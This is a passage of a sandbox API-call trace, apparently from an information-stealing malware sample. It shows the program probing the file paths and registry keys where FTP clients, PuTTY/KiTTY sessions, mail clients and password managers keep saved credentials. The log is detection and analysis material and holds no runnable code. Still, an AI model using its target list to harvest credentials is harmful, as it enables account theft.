lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0129.266] GetProcessHeap () returned 0x6a0000 [0129.266] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bac30 [0129.267] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0129.267] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x6bac30 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0129.268] GetProcessHeap () returned 0x6a0000 [0129.268] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f54) returned 0x6bb458 [0129.269] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0129.270] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\mSecure", arglist=0x19fb64 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\mSecure") returned 39 [0129.270] GetProcessHeap () returned 0x6a0000 [0129.270] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x52) returned 0x6bae98 [0129.270] GetProcessHeap () returned 0x6a0000 [0129.271] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0129.272] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.272] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents\\mSecure") returned 0 [0129.272] GetProcessHeap () returned 0x6a0000 [0129.273] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0129.273] GetProcessHeap () returned 0x6a0000 [0129.273] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bae98 | out: hHeap=0x6a0000) returned 1 [0129.278] GetProcessHeap () returned 0x6a0000 [0129.278] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bac30 [0129.279] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0129.279] SHGetFolderPathW (in: hwnd=0x0, csidl=35, hToken=0x0, dwFlags=0x0, pszPath=0x6bac30 | out: pszPath="C:\\ProgramData") returned 0x0 [0129.280] GetProcessHeap () returned 0x6a0000 [0129.280] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f58) returned 0x6bb458 [0129.281] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0129.281] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\Syncovery", arglist=0x19fb94 | out: param_1="C:\\ProgramData\\Syncovery") returned 24 [0129.281] GetProcessHeap () returned 0x6a0000 [0129.281] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x34) returned 0x6ad060 [0129.281] GetProcessHeap () returned 0x6a0000 [0129.282] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0129.282] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.283] PathFileExistsW (pszPath="C:\\ProgramData\\Syncovery") returned 0 [0129.283] GetProcessHeap () returned 0x6a0000 [0129.283] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0129.283] GetProcessHeap () returned 0x6a0000 [0129.283] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ad060 | out: hHeap=0x6a0000) returned 1 [0129.283] GetProcessHeap () returned 0x6a0000 [0129.283] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bac30 [0129.284] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0129.285] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x6bac30 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0129.285] GetProcessHeap () returned 0x6a0000 [0129.285] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f8e) returned 0x6bb458 [0129.319] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0129.320] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\FreshWebmaster\\FreshFTP\\FtpSites.SMF", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\FreshWebmaster\\FreshFTP\\FtpSites.SMF") returned 59 [0129.321] GetProcessHeap () returned 0x6a0000 [0129.321] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7a) returned 0x6bae98 [0129.321] GetProcessHeap () returned 0x6a0000 [0129.321] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0129.322] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.322] PathFileExistsW (pszPath="C:\\Program Files (x86)\\FreshWebmaster\\FreshFTP\\FtpSites.SMF") returned 0 [0129.323] GetProcessHeap () returned 0x6a0000 [0129.323] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bae98 | out: hHeap=0x6a0000) returned 1 [0129.323] GetProcessHeap () returned 0x6a0000 [0129.324] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0129.324] GetProcessHeap () returned 0x6a0000 [0129.324] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f6e) returned 0x6bb458 [0129.325] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0129.326] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\BitKinex\\bitkinex.ds", arglist=0x19fba0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\BitKinex\\bitkinex.ds") returned 58 [0129.326] GetProcessHeap () returned 0x6a0000 [0129.326] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x78) returned 0x6b8760 [0129.326] GetProcessHeap () returned 0x6a0000 [0129.326] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0129.327] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.328] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\BitKinex\\bitkinex.ds") returned 0 [0129.328] GetProcessHeap () returned 0x6a0000 [0129.329] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8760 | out: hHeap=0x6a0000) returned 1 [0129.329] GetProcessHeap () returned 0x6a0000 [0129.329] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f6a) returned 0x6bb458 [0129.330] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0129.331] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\UltraFXP\\sites.xml", arglist=0x19fba0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\UltraFXP\\sites.xml") returned 56 [0129.331] GetProcessHeap () returned 0x6a0000 [0129.331] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x74) returned 0x6b80e0 [0129.331] GetProcessHeap () returned 0x6a0000 [0129.332] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0129.332] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.333] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\UltraFXP\\sites.xml") returned 0 [0129.333] GetProcessHeap () returned 0x6a0000 [0129.333] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b80e0 | out: hHeap=0x6a0000) returned 1 [0129.333] GetProcessHeap () returned 0x6a0000 [0129.333] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f68) returned 0x6bb458 [0129.334] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0129.335] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\FTP Now\\sites.xml", arglist=0x19fba0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FTP Now\\sites.xml") returned 55 [0129.335] GetProcessHeap () returned 0x6a0000 [0129.335] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x72) returned 0x6b81e0 [0129.335] GetProcessHeap () returned 0x6a0000 [0129.336] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0129.337] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.337] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FTP Now\\sites.xml") returned 0 [0129.337] GetProcessHeap () returned 0x6a0000 [0129.337] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b81e0 | out: hHeap=0x6a0000) returned 1 [0129.337] GetProcessHeap () returned 0x6a0000 [0129.337] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x410) returned 0x6bb458 [0129.339] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.339] SHGetValueW (in: hkey=0x80000001, pszSubKey="Software\\VanDyke\\SecureFX", pszValue="Config Path", pdwType=0x0, pvData=0x6bb458, pcbData=0x19fba8*=0x104 | out: pdwType=0x0, pvData=0x6bb458, pcbData=0x19fba8*=0x104) returned 0x2 [0129.339] GetProcessHeap () returned 0x6a0000 [0129.339] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0129.344] GetProcessHeap () returned 0x6a0000 [0129.344] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bac30 [0129.344] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0129.345] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x6bac30 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0129.345] GetProcessHeap () returned 0x6a0000 [0129.345] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f8e) returned 0x6bb458 [0129.346] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0129.347] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\Odin Secure FTP Expert\\QFDefault.QFQ", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Odin Secure FTP Expert\\QFDefault.QFQ") returned 59 [0129.347] GetProcessHeap () returned 0x6a0000 [0129.347] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7a) returned 0x6bae98 [0129.347] GetProcessHeap () returned 0x6a0000 [0129.348] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0129.349] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.349] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Odin Secure FTP Expert\\QFDefault.QFQ") returned 0 [0129.349] GetProcessHeap () returned 0x6a0000 [0129.349] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bae98 | out: hHeap=0x6a0000) returned 1 [0129.350] GetProcessHeap () returned 0x6a0000 [0129.350] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0129.350] GetProcessHeap () returned 0x6a0000 [0129.350] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bac30 [0129.351] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0129.355] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x6bac30 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0129.355] GetProcessHeap () returned 0x6a0000 [0129.355] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f8c) returned 0x6bb458 [0129.356] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0129.357] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\Odin Secure FTP Expert\\SiteInfo.QFP", arglist=0x19fb94 | out: param_1="C:\\Program Files (x86)\\Odin Secure FTP Expert\\SiteInfo.QFP") returned 58 [0129.357] GetProcessHeap () returned 0x6a0000 [0129.357] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x78) returned 0x6b86e0 [0129.357] GetProcessHeap () returned 0x6a0000 [0129.357] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0129.358] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.358] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Odin Secure FTP Expert\\SiteInfo.QFP") returned 0 [0129.358] GetProcessHeap () returned 0x6a0000 [0129.359] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b86e0 | out: hHeap=0x6a0000) returned 1 [0129.359] GetProcessHeap () returned 0x6a0000 [0129.359] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0129.359] GetProcessHeap () returned 0x6a0000 [0129.359] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e8) returned 0x6bb458 [0129.359] GetProcessHeap () returned 0x6a0000 [0129.359] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x6ab4f0 [0129.360] GetProcessHeap () returned 0x6a0000 [0129.360] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baaf0 [0129.360] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0129.361] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\NCH Software\\Fling\\Accounts", phkResult=0x6baaf0 | out: phkResult=0x6baaf0*=0x0) returned 0x2 [0129.361] GetProcessHeap () returned 0x6a0000 [0129.361] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baaf0 | out: hHeap=0x6a0000) returned 1 [0129.362] GetProcessHeap () returned 0x6a0000 [0129.362] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa90 [0129.362] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0129.363] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\NCH Software\\Fling\\Accounts", phkResult=0x6baa90 | out: phkResult=0x6baa90*=0x0) returned 0x2 [0129.363] GetProcessHeap () returned 0x6a0000 [0129.363] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa90 | out: hHeap=0x6a0000) returned 1 [0129.364] GetProcessHeap () returned 0x6a0000 [0129.364] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0129.364] GetProcessHeap () returned 0x6a0000 [0129.364] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ab4f0 | out: hHeap=0x6a0000) returned 1 [0129.364] GetProcessHeap () returned 0x6a0000 [0129.364] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e8) returned 0x6bb458 [0129.364] GetProcessHeap () returned 0x6a0000 [0129.364] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x6ab4f0 [0129.364] GetProcessHeap () returned 0x6a0000 [0129.364] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9e0 [0129.365] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0129.366] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\NCH Software\\ClassicFTP\\FTPAccounts", phkResult=0x6ba9e0 | out: phkResult=0x6ba9e0*=0x0) returned 0x2 [0129.366] GetProcessHeap () returned 0x6a0000 [0129.366] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9e0 | out: hHeap=0x6a0000) returned 1 [0129.366] GetProcessHeap () returned 0x6a0000 [0129.366] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba970 [0129.366] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0129.367] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\NCH Software\\ClassicFTP\\FTPAccounts", phkResult=0x6ba970 | out: phkResult=0x6ba970*=0x0) returned 0x2 [0129.367] GetProcessHeap () returned 0x6a0000 [0129.367] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba970 | out: hHeap=0x6a0000) returned 1 [0129.367] GetProcessHeap () returned 0x6a0000 [0129.368] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0129.368] GetProcessHeap () returned 0x6a0000 [0129.368] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ab4f0 | out: hHeap=0x6a0000) returned 1 [0129.368] GetProcessHeap () returned 0x6a0000 [0129.368] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e8) returned 0x6bb458 [0129.368] GetProcessHeap () returned 0x6a0000 [0129.368] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x6ab4f0 [0129.368] GetProcessHeap () returned 0x6a0000 [0129.368] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab40 [0129.369] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0129.370] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\9bis.com\\KiTTY\\Sessions", phkResult=0x6bab40 | out: phkResult=0x6bab40*=0x0) returned 0x2 [0129.370] GetProcessHeap () returned 0x6a0000 [0129.370] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab40 | out: hHeap=0x6a0000) returned 1 [0129.370] GetProcessHeap () returned 0x6a0000 [0129.370] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baad0 [0129.371] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0129.372] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\SimonTatham\\PuTTY\\Sessions", phkResult=0x6baad0 | out: phkResult=0x6baad0*=0x0) returned 0x2 [0129.372] GetProcessHeap () returned 0x6a0000 [0129.372] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baad0 | out: hHeap=0x6a0000) returned 1 [0129.372] GetProcessHeap () returned 0x6a0000 [0129.372] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9a0 [0129.373] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0129.373] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\SimonTatham\\PuTTY\\Sessions", phkResult=0x6ba9a0 | out: phkResult=0x6ba9a0*=0x0) returned 0x2 [0129.374] GetProcessHeap () returned 0x6a0000 [0129.374] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9a0 | out: hHeap=0x6a0000) returned 1 [0129.374] GetProcessHeap () returned 0x6a0000 [0129.374] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba980 [0129.375] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0129.376] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\9bis.com\\KiTTY\\Sessions", phkResult=0x6ba980 | out: phkResult=0x6ba980*=0x0) returned 0x2 [0129.376] GetProcessHeap () returned 0x6a0000 [0129.376] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba980 | out: hHeap=0x6a0000) returned 1 [0129.376] GetProcessHeap () returned 0x6a0000 [0129.376] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0129.376] GetProcessHeap () returned 0x6a0000 [0129.376] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ab4f0 | out: hHeap=0x6a0000) returned 1 [0129.376] GetProcessHeap () returned 0x6a0000 [0129.376] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x410) returned 0x6bb458 [0129.377] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.378] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\Mozilla\\Mozilla Thunderbird", pszValue="CurrentVersion", pdwType=0x0, pvData=0x6bb458, pcbData=0x19fba4*=0x104 | out: pdwType=0x0, pvData=0x6bb458, pcbData=0x19fba4*=0x104) returned 0x2 [0129.378] GetProcessHeap () returned 0x6a0000 [0129.378] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0129.378] GetProcessHeap () returned 0x6a0000 [0129.379] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f5e) returned 0x6bb458 [0129.379] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0129.380] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\Foxmail\\mail", arglist=0x19fbb8 | out: param_1="C:\\Program Files (x86)\\Foxmail\\mail") returned 35 [0129.380] GetProcessHeap () returned 0x6a0000 [0129.381] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4a) returned 0x6bac30 [0129.381] GetProcessHeap () returned 0x6a0000 [0129.381] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0129.383] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.383] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Foxmail\\mail") returned 0 [0129.383] GetProcessHeap () returned 0x6a0000 [0129.384] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0129.385] GetProcessHeap () returned 0x6a0000 [0129.385] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bac30 [0129.385] ExpandEnvironmentStringsW (in: lpSrc="%SYSTEMDRIVE%", lpDst=0x6bac30, nSize=0x104 | out: lpDst="C:") returned 0x3 [0129.387] Sleep (dwMilliseconds=0xa) [0129.408] GetProcessHeap () returned 0x6a0000 [0129.408] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f4a) returned 0x6bb458 [0129.409] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0129.410] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\%s", arglist=0x19f938 | out: param_1="C:\\Foxmail*") returned 11 [0129.410] GetProcessHeap () returned 0x6a0000 [0129.410] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1a) returned 0x6b3760 [0129.410] GetProcessHeap () returned 0x6a0000 [0129.410] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0129.411] FindFirstFileW (in: lpFileName="C:\\Foxmail*" (normalized: "c:\\foxmail*"), lpFindFileData=0x19f94c | out: lpFindFileData=0x19f94c*(dwFileAttributes=0x560055, ftCreationTime.dwLowDateTime=0x580057, ftCreationTime.dwHighDateTime=0x5a0059, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x620061, ftLastWriteTime.dwLowDateTime=0x640063, ftLastWriteTime.dwHighDateTime=0x660065, nFileSizeHigh=0x680067, nFileSizeLow=0x6a0069, dwReserved0=0x6c006b, dwReserved1=0x6e006d, cFileName="opqr\x08", cAlternateFileName="갰kĄ")) returned 0xffffffff [0129.411] GetProcessHeap () returned 0x6a0000 [0129.411] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3760 | out: hHeap=0x6a0000) returned 1 [0129.411] GetProcessHeap () returned 0x6a0000 [0129.412] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0129.412] GetProcessHeap () returned 0x6a0000 [0129.412] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f70) returned 0x6bb458 [0129.415] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0129.416] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\Pocomail\\accounts.ini", arglist=0x19fb5c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Pocomail\\accounts.ini") returned 59 [0129.416] GetProcessHeap () returned 0x6a0000 [0129.416] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7a) returned 0x6bac30 [0129.416] GetProcessHeap () returned 0x6a0000 [0129.417] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0129.417] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.418] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Pocomail\\accounts.ini") returned 0 [0129.418] GetProcessHeap () returned 0x6a0000 [0129.418] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0129.418] GetProcessHeap () returned 0x6a0000 [0129.418] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bac30 [0129.419] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0129.420] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x6bac30 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0129.420] GetProcessHeap () returned 0x6a0000 [0129.420] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f70) returned 0x6bb458 [0129.421] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0129.422] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\Pocomail\\accounts.ini", arglist=0x19fb50 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\Pocomail\\accounts.ini") returned 53 [0129.422] GetProcessHeap () returned 0x6a0000 [0129.422] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x6e) returned 0x6bae98 [0129.422] GetProcessHeap () returned 0x6a0000 [0129.422] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0129.425] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.425] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents\\Pocomail\\accounts.ini") returned 0 [0129.425] GetProcessHeap () returned 0x6a0000 [0129.426] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bae98 | out: hHeap=0x6a0000) returned 1 [0129.426] GetProcessHeap () returned 0x6a0000 [0129.426] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0129.426] GetProcessHeap () returned 0x6a0000 [0129.426] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e8) returned 0x6bb458 [0129.426] GetProcessHeap () returned 0x6a0000 [0129.426] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x6ab4f0 [0129.426] GetProcessHeap () returned 0x6a0000 [0129.427] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba970 [0129.427] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0129.428] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\IncrediMail\\Identities", phkResult=0x6ba970 | out: phkResult=0x6ba970*=0x0) returned 0x2 [0129.428] GetProcessHeap () returned 0x6a0000 [0129.428] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba970 | out: hHeap=0x6a0000) returned 1 [0129.428] GetProcessHeap () returned 0x6a0000 [0129.428] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa10 [0129.429] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0129.430] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\IncrediMail\\Identities", phkResult=0x6baa10 | out: phkResult=0x6baa10*=0x0) returned 0x2 [0129.430] GetProcessHeap () returned 0x6a0000 [0129.430] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa10 | out: hHeap=0x6a0000) returned 1 [0129.430] GetProcessHeap () returned 0x6a0000 [0129.431] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0129.431] GetProcessHeap () returned 0x6a0000 [0129.431] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ab4f0 | out: hHeap=0x6a0000) returned 1 [0129.431] GetProcessHeap () returned 0x6a0000 [0129.431] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f84) returned 0x6bb458 [0129.432] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0129.433] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\GmailNotifierPro\\ConfigData.xml", 